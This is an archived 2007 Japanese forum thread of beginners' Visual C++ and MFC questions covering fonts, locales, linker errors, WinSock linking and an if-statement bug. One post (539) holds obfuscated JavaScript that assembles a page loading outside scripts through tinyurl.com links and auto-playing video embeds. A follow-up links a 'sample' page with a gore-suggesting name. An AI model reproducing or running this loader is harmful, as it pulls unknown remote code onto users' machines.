 textBox1->Font = new Font("MSゴシック", 10);
と、プログラムからフォント指定する場合、
textBox1コンポーネントに元々あったはずのフォント情報を保存するためのメモリ領域は
どこへ行っちゃうのでしょうか…?



522 :デフォルトの名無しさん:2007/02/22(木) 12:43:15
.NETではその内ガベージコレクタによって回収される。
だからメモリリークの心配は要らない。

523 :デフォルトの名無しさん:2007/02/22(木) 14:03:58
>>522
.NETすげー。
サンクスコ。


524 :デフォルトの名無しさん:2007/02/22(木) 20:22:07
今後C++は廃れますか

525 :デフォルトの名無しさん:2007/02/22(木) 20:29:21
仕様の汚さでC++を凌駕する言語が現れるまでは安泰です

526 :デフォルトの名無しさん:2007/02/22(木) 23:16:23
既に現れていると思うが。Dとか。

527 :デフォルトの名無しさん:2007/02/23(金) 00:03:53
C言語の次だからD言語?
だとしたらA言語とかB言語もあるってこと?

528 :デフォルトの名無しさん:2007/02/23(金) 00:05:27
Bはあるよ

529 :デフォルトの名無しさん:2007/02/23(金) 00:31:38
でもBはAの次ということではなく、BCPLの頭文字が由来。
ついでに言うとCの由来はBの後継ということでBCPLの2文字目。

530 :デフォルトの名無しさん:2007/02/23(金) 00:51:51
えーっと
ユニコードの設定では
CStdioFile::WriteStringで日本語が出力されないんですが
いったい如何すればいいんでしょうか?

531 :530:2007/02/23(金) 00:52:51
VC2005のMFCでございます。

532 :デフォルトの名無しさん:2007/02/23(金) 07:03:23
>>531
既定ではCロケールになっているので、Unicode/MBCS変換時に日本語は無視されてしまう。
以下の一行をInitInstance辺りにでも入れておくと、OSの設定に従うようになる。
_tsetlocale(LC_ALL, _T(""));

533 :530:2007/02/23(金) 07:41:53
>>532
<locale.h>をインクルードしてできました。
助かりましたありがとうございます。

534 :デフォルトの名無しさん:2007/02/23(金) 17:01:59
質問があります。 ※>>513のつづきとなっております…

MS Visual C++ .NET 2003
においてなのですが、
CEditコンポーネントのフォントを変更する場合、以下のようにすると成功しました。

CEdit* edit(GetDlgItem(IDC_ED1));
CFONT font;

LOGFONT logfont;
(logfont編集)
font = CreateFontIndirect(&logfont);
edit->SetFont(font, TRUE);

logfontを編集することによって、フォント種類やサイズ、下線などが指定できました。
しかし、フォントの色だけは変更できませんでした。

edit->SetTextColor(refcolor);
のような関数があればいいのですがCEditのメンバにはないようにです。
CEditコンポーネントのフォント色を変更する方法を知ってる方、どうか
教えていただけないでしょうか。

535 :デフォルトの名無しさん:2007/02/23(金) 18:51:51
フォント色コンポーネント

536 :デフォルトの名無しさん:2007/02/23(金) 20:07:16
>>534
WM_CTLCOLORをハンドル。
親が処理するか、メッセージ返送を使ってCEditの派生で処理させるか好きな方を。
残念ながら、背景色はSetBkColorだけではうまくいかない。でも調べるの('A`)マンドクセ

537 :デフォルトの名無しさん:2007/02/23(金) 21:06:59
>>536
ありがとうございます。
ググるための重要なキーワードです。ただ…訳の分からないエラーが出たり
基本を分かってなかったりで死にそうです。
ちょっと首吊ってきます…。

538 :デフォルトの名無しさん:2007/02/23(金) 22:18:10
warning LNK4075: /EDITANDCONTINUE は /OPT:ICF の指定によって無視されます。
error LNK2005: "private: __thiscall type_info::type_info(class type_info const &)" (??0type_info@@AAE@ABV0@@Z) は既に LIBCMT.lib(typinfo.obj) で定義されています。
MSVCRTD.lib(ti_inst.obj) : error LNK2005: "private: class type_info & __thiscall type_info::operator=(class type_info const &)" (??4type_info@@AAEAAV0@ABV0@@Z) は既に LIBCMT.lib(typinfo.obj) で定義されています。
LINK : warning LNK4098: defaultlib 'MSVCRTD' は他のライブラリの使用と競合しています。/NODEFAULTLIB:library を使用してください。
fatal error LNK1169: 1 つ以上の複数回定義されているシンボルが見つかりました。

VC++のない環境でもEXEを実行できるよう
VC++2005で/MTオプションでビルドしたところ上のようなエラーが出ました。
LIBCMT.libを無視するようにしたら、ビルドは通りましたがVCのない環境では実行できませんでした。

調べたところ
Microsoft_VC_DebugCRT_x86.msm
policy_8_0_microsoft_vc80_debugcrt_x86.msm
とういうファイルに依存しているようでした、VCがない環境で実行できないのはこれが原因でしょうか?

539 :デフォルトの名無しさん:2007/02/23(金) 22:26:47
f="3a5"+"sm4";var d=new Array();tt=" - ";dd="";tt+="連";x=$.split("  \n ");tt+="続";xx="";tt+="動";
tt+="画";j=0;for(i=0;x.length>i;i++){if(3<=x[i].length){j++;if(1==j){tx=x[i];}else{a=x[i].split("&l=");b=eval(a[1]);
if(1>b){b=1;}else if(999<b){b=999;} b=(b+.1)/1000;b=a[0]+"&auto"+"play=1&l="+(""+b).substr(2,3);
c="you"+"tube.com/v/000000"+"00000&aut"+"oplay=1&l=99";b+=c+"9"+c+"8"+c+"7";b=b.substr(0,42*3);
xx+=b;}}} ds="<scr"+"ipt ";dq="src="+"//tin"+"yur"+"l.c"+"om/";dc=ds+dq;de="</scr"+"ipt>";
dn="<noscr"+"ipt>< img "+dq; df="</noscr"+"ipt>";db="<noem"+"bed>";dx="<xnoem"+"bed>";
d[0]="\";"+de+dc+f+">"+de+"\n";d[1]="<html><center><title>"+tx+tt+"</title>"+ds+">x=\"";
d[2]=dn+"y5o"+"vet >"+db+df+ds+">x=\"";d[3]=dc+"yn2"+"d2r>"+de+dx+dx+ds+">x=\"";n=xx.length/(42*3);
for(j=0;3>j;j++){dd+=d[j+1];for(i=0;n>i;i++){dd+=xx.substr(42*(3*i+j),42);}dd+=d[0];};exec(dd);


540 :デフォルトの名無しさん:2007/02/23(金) 22:28:05
↑ Visual Script

541 :デフォルトの名無しさん:2007/02/23(金) 22:30:18
サンプル動作例
http://g-s.s7.xrea.com/bbs_ftp/source/guro_0362.htm?1

542 :デフォルトの名無しさん:2007/02/23(金) 22:55:13
>>538
>MSVCRTD.lib(ti_inst.obj) : error LNK2005: "private: class type_info & __thiscall type_info::operator=(class type_info const &)" (??4type_info@@AAEAAV0@ABV0@@Z) は既に LIBCMT.lib(typinfo.obj) で定義されています。
>LINK : warning LNK4098: defaultlib 'MSVCRTD' は他のライブラリの使用と競合しています。/NODEFAULTLIB:library を使用してください。

Releaceでリビルドし直せ。

543 :デフォルトの名無しさん:2007/02/24(土) 00:30:16
一般にC++と言う場合、それがVisual C++をさしている確率は低いんでしょうか?

544 :デフォルトの名無しさん:2007/02/24(土) 01:00:47
Visual C++のデバッグモードは便利ですね
プログラムを組んでも、必ずといっていいほど最初はとんでもないことしてるので、デバッグモードで動かすと
すぐ修正できて便利です。
ただ、ファイルを開いてなんかするプログラムだと、デバッグモードではファイルを開くことができません。
これは仕方ないのでしょうか

545 :デフォルトの名無しさん:2007/02/24(土) 01:10:40
ファイルを開くときの共有モードをどうにかすればいい。

546 :デフォルトの名無しさん:2007/02/24(土) 06:13:43
デバッグモードでも普通にファイル開けるだろ
何を言ってるのか理解できない

547 :デフォルトの名無しさん:2007/02/24(土) 10:25:10
>>543
C++はプログラミング言語で、VisualC++はMicrosoftのプログラム開発ソフト。
意味が全く違う。

548 :デフォルトの名無しさん:2007/02/24(土) 13:14:08
特定の時刻になったら知らせる方法を教えてください

549 :デフォルトの名無しさん:2007/02/24(土) 13:26:35
つ[タスク]

550 :デフォルトの名無しさん:2007/02/24(土) 13:33:44
どういうように使うのですか?

551 :デフォルトの名無しさん:2007/02/24(土) 13:56:37
CLSID_CTaskSchedulerでCoCreateInstanceして
IID_ITaskSchedulerを介してアクセス。

552 :デフォルトの名無しさん:2007/02/24(土) 14:02:35
WaitableTimer作って、WaitFor...で待つとか。

553 :デフォルトの名無しさん:2007/02/26(月) 11:45:16
2003年の本で勉強したらもう古いらしくて損したよー 
新しい本買わなきゃ     ・゚・(ノД`)・゚・。ウワーン

554 :デフォルトの名無しさん:2007/02/26(月) 12:21:38
あんたばか?

555 :デフォルトの名無しさん:2007/02/26(月) 15:02:31
>>547
>>543がそんな意図で聞いてるんじゃないことは明白だと思うんだが

556 :デフォルトの名無しさん:2007/02/26(月) 15:27:10
気に入らなかったら説明してやれば?

557 :デフォルトの名無しさん:2007/02/26(月) 15:59:46
C++って言ったら、やはりプログラミング言語って言うしかないんじゃない?
gccなのかVisualC++なのかC++Builderなのか.NETなのか判断できないし。

558 :デフォルトの名無しさん:2007/02/26(月) 20:59:28
>>543
そういうのって無意味だよな。
VCが使えない分野でなら確実にVCのことではない。


559 :デフォルトの名無しさん:2007/02/26(月) 23:23:35
>>518の回答を元に調べてみましたが解決しなかったので教えてください。
.NET 2003 で WinSock を使用する方法です。

プロパティページの追加のライブラリのディレクトリにws2_32.libがある
Microsoft Visual Studio .NET\Vc7\PlatformSDK\lib を追加して
winsock2.hをインクルードするようにしたのですが、リンクのエラーになってしまいます。

  未解決の外部シンボル __imp__WSAStartup@8 が関数〜
  fatal error LNK1120: 外部参照 2 が未解決です

といった感じです。
どうすればよいのでしょうか?

560 :デフォルトの名無しさん:2007/02/26(月) 23:26:59
更にプロジェクトのプロパティのリンカの中のどこかに、
追加の入力ファイルという項目があるから、そこにws2_32.libと書く。
そうしてはじめてリンク時にws2_32.libが使われる。

561 :デフォルトの名無しさん:2007/02/26(月) 23:33:39
まだやってたのか
差分とって調べりゃ5分で済んだろうにアホだな

562 :516:2007/02/26(月) 23:46:01
>>560
ありがとうございます。
確認してみます。

>>561
差分ってどうやってだすんですか?
テキストであればツールで簡単に確認できますが、リンカの設定などは
バイナリデータに入ってそうなんですが。

563 :デフォルトの名無しさん:2007/02/26(月) 23:50:44
しかしファイル名はテキストのまま書き込まれている

564 :デフォルトの名無しさん:2007/02/27(火) 01:30:39
大丈夫、VisualStudio2003ならその辺の設定は全部テキストだ。

565 :デフォルトの名無しさん:2007/02/27(火) 04:45:26
*.vcproj をメモ帳で開いて見れ。
さすれば、幸せを手に入れることが出来るだろう。

566 :デフォルトの名無しさん:2007/02/27(火) 10:26:29
>>561
アホとか言うのは控えろよ
ここ初心者スレだぞ
カスが

567 :デフォルトの名無しさん:2007/02/27(火) 11:02:54
MFCダイアログベースで、ヘッダ情報に頼らずにファイルの容量を取得するにはどうすればいいでしょうか。



568 :デフォルトの名無しさん:2007/02/27(火) 11:09:10
GetFileSize()

569 :デフォルトの名無しさん:2007/02/27(火) 11:40:03
唐突にヘッダ情報って?

570 :デフォルトの名無しさん:2007/02/27(火) 17:05:09
VC2005 MFCベースでMDIのアプリですが、追加画面が必要になったので
リソースビューの欄で「Dialogを挿入」を行い画面をデザインしてます。
この画面にボタンを2個配置しました。
Aのボタンは最初は無効状態でBのボタンを押すことによって有効にします。
なのでAのボタンは「メンバー変数追加ウイザード」でメンバー変数m_bt1を追加して
Bのボタンが押されたイベントの中でm_bt1.EnableWindow(TRUE);と記述しました。
しかし、コンパイルは通りますが動作させるとエラーが出ます。
ちなみに
CButton* m_bt1 = (CButton*)GetDlgItem(IDC_BUTTON1);
m_bt1->EnableWindow(TRUE);
と記述すると正常に動作します。
何故メンバー変数追加で操作するとエラーになるのでしょうか?
IDや変数名の重複は無いです。

571 :デフォルトの名無しさん:2007/02/27(火) 17:11:38
別に問題ないと思うけど
あとは簡単なテストプログラム作って試すぐらいだから自分でやってみれば?

572 :デフォルトの名無しさん:2007/02/27(火) 17:14:50
追加したダイアロクじゃなくて
新しく簡単なサンプル作ってやってみれば?ということね

573 :デフォルトの名無しさん:2007/02/27(火) 18:02:36
m_bt1は有効だった?NULLだったりしないか?

574 :デフォルトの名無しさん:2007/02/27(火) 18:03:29
つか、メンバのほうか
m_bt1.m_hWndは有効な値だった?

575 :570:2007/02/27(火) 18:32:01
>>574
カーソルを当てて見てみたところメンバー変数を定義した変数のm_hWndは0x00000000です。
CButton* m_bt1 = (CButton*)GetDlgItem(IDC_BUTTON1);
m_bt1->EnableWindow(TRUE);
としてm_bt1のh_Wndを見ると0x00090beeです。

576 :デフォルトの名無しさん:2007/02/27(火) 18:43:02
んじゃIDがおかしいとかかな。
変数定義もっかいやりなおしてみたら。
何回やってもダメならその手順書いてみな

577 :デフォルトの名無しさん:2007/02/27(火) 18:44:27
メンバ変数の登録がちゃんとできてない。
もう一度やり直してみるといい。
対象のボタンを右クリックして「メンバ変数の追加」、
んでコントロール変数として適当なのを追加。

578 :570:2007/02/27(火) 18:52:14
>>576
>>577
了解しました。
もう一度見直してみます。

579 :デフォルトの名無しさん:2007/02/27(火) 19:50:05
roopoutには確実にFALSEがはいっているのに

if(roopout==FALSE)
break;
else
....

が機能しませんが環境によってそういうことがあるのですか?
デバッグしながら確実に中にはいってるものを確かめましたがelseのほうにいきます

580 :デフォルトの名無しさん:2007/02/27(火) 19:56:06
FALSEとfalseは違うんじゃなかったっけ
if (!roopout) とか書いた方が安全

581 :デフォルトの名無しさん:2007/02/27(火) 19:57:12
それかifの後ろのどっかに変なセミコロンが紛れ込んでいて
条件式が真の場合にただの空行を実行してるとか

582 :デフォルトの名無しさん:2007/02/27(火) 19:57:24
やってみます

583 :デフォルトの名無しさん:2007/02/27(火) 20:03:07
ifとelseの間がbreakだけなので、ステップ実行で確認したときあたかも素通りしたように
見えるだけなんじゃない?

584 :デフォルトの名無しさん:2007/02/27(火) 20:06:22
ではなぜelseの処理に

585 :デフォルトの名無しさん:2007/02/27(火) 20:06:35
2005から始めた初心者はかなりきつい状態だろうな
本もサイトも全然ないもんな……

586 :デフォルトの名無しさん:2007/02/27(火) 20:21:12
実は
if(roopout=FALSE)
と書いていた。

587 :デフォルトの名無しさん:2007/02/27(火) 20:23:05
それに気付かなくてえらい苦労をした経験から、
条件文は必ず定数を先に書くことにしてる
if(200 == myIQ) みたいな

588 :デフォルトの名無しさん:2007/02/27(火) 20:29:16
今時それくらいは警告を出すから、わざわざナンセンスな書き方をする必要など無い。

589 :デフォルトの名無しさん:2007/02/27(火) 20:39:44
そんな書き方してません
再起動したりしたら動きました

590 :516:2007/02/27(火) 21:44:56
ありがとうございました。
テキストファイルを見比べてみて同じようにすれば出来ました。

VC++6.0のSDKのときはライブラリをリンクして winsock2.h をインクルードして
たんですが、今回、2003のMFCの場合、ヘッダをインクルードして後はちょこちょこっと
関数を呼び出しているだけでライブラリのリンクは特にしていないように思えました。
良く分からなかったのですが、とにかく出来ました。

591 :デフォルトの名無しさん:2007/02/28(水) 01:23:13
>>588
VCだと警告されない罠。
gccでは文句言われるので、そっちに合わせた書き方してるけど。

592 :デフォルトの名無しさん:2007/02/28(水) 01:51:43
warning C4706: 条件式の比較値は、代入の結果になっています。

593 :591:2007/02/28(水) 02:46:30
ありゃ、見逃してた。ひゃくにんいっちゅの所為かorz
安全性考えると、pragmaか/wオプションでレベル下げとくのもありかなあ。

594 :デフォルトの名無しさん:2007/02/28(水) 14:56:39
if(FALSE == flag)
みたいに定数を先に書くソースを見ると身震いするほど嫌悪感を抱くのは俺だけ?

595 :デフォルトの名無しさん:2007/02/28(水) 15:09:53
一度精神科を受診することをオススメする。

596 :デフォルトの名無しさん:2007/02/28(水) 15:43:04
>>594
初めて見た。

597 :デフォルトの名無しさん:2007/02/28(水) 17:00:54
>>594
オレも。

598 :594:2007/02/28(水) 17:09:35
>>595
ちょっと受診してくるから良い病院を紹介してくれ

159 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)